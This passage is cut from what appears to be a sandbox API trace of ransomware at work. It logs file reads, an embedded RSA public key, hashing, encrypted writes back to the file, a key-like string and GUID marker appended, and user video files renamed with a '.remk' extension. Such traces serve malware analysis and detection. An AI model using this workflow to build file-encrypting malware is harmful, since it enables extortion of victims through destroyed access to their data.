hHeap=0x630000) returned 1 [0235.696] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.696] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x7902, lpOverlapped=0x0) returned 1 [0235.697] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0235.697] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.697] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0235.697] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695058) returned 1 [0235.698] CryptCreateHash (in: hProv=0x695058, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0235.698] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0235.698] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0235.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0235.698] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0235.698] GetLastError () returned 0x0 [0235.699] CryptDestroyHash (hHash=0x31de170) returned 1 [0235.699] CryptReleaseContext (hProv=0x695058, dwFlags=0x0) returned 1 [0235.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.699] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0235.699] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0235.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.699] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0235.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0235.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7900) returned 0x37c6278 [0235.699] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0235.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0235.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0235.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0235.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d028 [0235.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc4f8 [0235.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d070 [0235.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc510 [0235.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc540 [0235.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5a0 [0235.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc558 [0235.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0235.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0235.700] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0235.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0235.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc540 | out: hHeap=0x630000) returned 1 [0235.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc558 | out: hHeap=0x630000) returned 1 [0235.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5a0 | out: hHeap=0x630000) returned 1 [0235.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0235.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0235.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5a0 [0235.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0235.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc558 [0235.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0235.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc540 [0235.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0235.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0235.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0235.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0235.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0235.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0235.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0235.701] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0235.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc558 | out: hHeap=0x630000) returned 1 [0235.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc540 | out: hHeap=0x630000) returned 1 [0235.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0235.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5a0 | out: hHeap=0x630000) returned 1 [0235.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0235.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0235.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0235.702] GetCurrentThreadId () returned 0x314 [0235.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0235.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c4dd0 [0235.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0235.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0235.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0235.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0235.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.702] GetCurrentThreadId () returned 0x314 [0235.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x3192918 [0235.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0235.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0235.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0235.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0235.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0235.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0235.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0235.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5a0 [0235.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0235.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0235.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0235.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0235.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0235.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0235.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc540 [0235.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0235.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0235.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0235.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0235.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0235.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc558 [0235.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0235.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0235.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0235.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc528 [0235.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0235.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc5b8 [0235.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0235.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0235.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc588 [0235.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0235.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc570 [0235.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc5d0 [0235.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc570 | out: hHeap=0x630000) returned 1 [0235.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc570 [0235.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc588 | out: hHeap=0x630000) returned 1 [0235.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0235.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0235.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0235.705] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0235.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0235.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc540 | out: hHeap=0x630000) returned 1 [0235.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc540 [0235.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0235.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0235.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5a0 | out: hHeap=0x630000) returned 1 [0235.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0235.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5d0 | out: hHeap=0x630000) returned 1 [0235.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0db8 [0235.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0235.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0235.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0235.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0235.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc540 | out: hHeap=0x630000) returned 1 [0235.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37c0fd0 [0235.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0235.706] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: hHeap=0x630000) returned 1 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fd0 | out: hHeap=0x630000) returned 1 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc570 | out: hHeap=0x630000) returned 1 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc5b8 | out: hHeap=0x630000) returned 1 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc558 | out: hHeap=0x630000) returned 1 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc528 | out: hHeap=0x630000) returned 1 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0235.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc510 | out: hHeap=0x630000) returned 1 [0235.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d070 | out: hHeap=0x630000) returned 1 [0235.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0235.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0235.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0235.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0235.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0235.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0235.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0235.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0235.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0235.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0235.708] WriteFile (in: hFile=0x640, lpBuffer=0x37c6278*, nNumberOfBytesToWrite=0x78fd, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c6278*, lpNumberOfBytesWritten=0x3adfb14*=0x78fd, lpOverlapped=0x0) returned 1 [0235.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c6278 | out: hHeap=0x630000) returned 1 [0235.709] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x7902, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.709] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0235.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0235.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0235.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0235.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0235.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0235.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0235.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0235.709] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0235.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0235.709] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.709] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0235.709] CloseHandle (hObject=0x640) returned 1 [0235.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6768 [0235.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x37bd408 [0235.715] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6768 | out: hHeap=0x630000) returned 1 [0235.715] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\e0OK1KsDLkbK.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\e0ok1ksdlkbk.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\e0OK1KsDLkbK.swf.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\e0ok1ksdlkbk.swf.remk")) returned 1 [0235.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0235.716] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0235.716] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0235.718] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1d961f0, ftCreationTime.dwHighDateTime=0x1d5e791, ftLastAccessTime.dwLowDateTime=0xa85d14a0, ftLastAccessTime.dwHighDateTime=0x1d5e41b, ftLastWriteTime.dwLowDateTime=0xa85d14a0, ftLastWriteTime.dwHighDateTime=0x1d5e41b, nFileSizeHigh=0x0, nFileSizeLow=0x177b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v0svWrNd01t99.swf", cAlternateFileName="V0SVWR~1.SWF")) returned 1 [0235.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695058 [0235.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x31c7810 [0235.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695058 | out: 